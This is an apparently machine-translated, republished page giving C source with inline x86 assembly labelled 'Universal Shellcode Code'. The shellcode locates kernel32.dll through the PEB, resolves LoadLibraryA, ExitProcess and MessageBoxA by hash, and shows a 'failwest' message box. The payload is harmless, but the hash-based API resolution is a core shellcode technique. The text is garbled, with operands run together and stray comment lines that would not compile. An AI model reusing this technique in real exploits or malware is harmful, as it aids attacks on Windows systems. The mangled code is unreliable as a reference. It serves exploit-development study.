Home > Others

Universal Shellcode Code

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

#include <stdio.h>
#include <windows.h>

int main ()
{
__asm
{
CLD//empty flag bit DF
Push 0X1E380A6A//press-in Messageboxa-->user32.dll
Push 0x4fd18963//press-in Exitprocess-->kernel32.dll
Push 0x0c917432//press-in Loadlibrarya-->kernel32.dll
mov Esi,esp//esi=esp, pointing to the address in the stack where LoadLibraryA is stored
Lea Edi,[esi-0xc]//edi = stack top position -0xc, e.g. 0x0012ff28-0xc==0x0012ff1c
====== open up some stack space
Xorebx,ebx
movbh,0x04
Subesp,ebx
====== pressed into "user32.dll"
movbx,0x3233
pushebx//0x00003233
push0x72657375//user
Pushesp
Xoredx,edx//edx=0
====== looking for Kernel32.dll's base address.
MOVEBX,FS:[EDX+0X30]//[teb+0x30]-->peb
MOVECX,[EBX+0XC]//[PEB+0XC]--->peb_ldr_data
MOVECX,[ECX+0X1C]//[PEB_LDR_DATA+0X1C]--->ininitializationordermodulelist
MOVECX,[ECX]//Enter the list the first one is Ntdll.dll
Base Address of movebp,[ecx+0x8]//ebp= Kernel32.dll

Find_lib_functions:
LODSD//eax=[ds*10h+esi], read out is the LoadLibraryA hash
CMPEAX,0X1E380A6A//With the hash of the messageboxa is not equal, must jump
Jnefind_functions
Xchgeax,ebp
CALL[EDI-0X8]
Xchgeax,ebp

Find_functions:
Pushad//Protection register
MOVEAX,[EBP+0X3C]//PE Head
movecx,[ebp+eax+0x78]//pointers to exported tables
addecx,ebp//ecx=0x78c00000+0x262c
movebx,[ecx+0x20]//Name List of exported functions
ADDEBX,EBP//ebx=0x78c00000+0x353c
Xoredi,edi//Here it is.

Next_function_loop:
Incedi
MOV esi,[ebx+edi*4]//read from the list array
ADDESI,EBP//esi = Address of function name
Cdq

Hash_loop:
Movsxeax,byte Ptr[esi]
Cmpal,ah
Jzcompare_hash
Ror edx,7
Addedx,eax
Incesi
Jmphash_loop

Compare_hash:
CMPEDX,[ESP+0X1C]
Jnznext_function_loop


MOVEBX,[ECX+0X24]//
ADDEBX,EBP//= 0x78c00000+0x4424
MOV Di,[ebx+2*edi]
MOVEBX,[ECX+0X1C]
Addebx,ebp
Addebp,[ebx+4*edi]
Xchgeax,ebp
Popedi
Stosd

Pushedi
Popad

cmpeax,0x1e380a6a
Jnefind_lib_functions

Function_call:
Xorebx,ebx
PUSHEBX//cut String
push0x74736577
push0x6c696166//push Failwest
Moveax,esp
Pushebx
Pusheax
Pusheax
Pushebx
CALL[EDI-0X04]//callmessageboxa
Pushebx
CALL[EDI-0X08]//call exitprocess
Nop
Nop
Nop
Nop
}
return 0;
}

Universal Shellcode Code

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
universal cvv code furrion universal remote code ge universal remote control code list ge universal remote control code list universal ssl universal unicorn efs universal

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More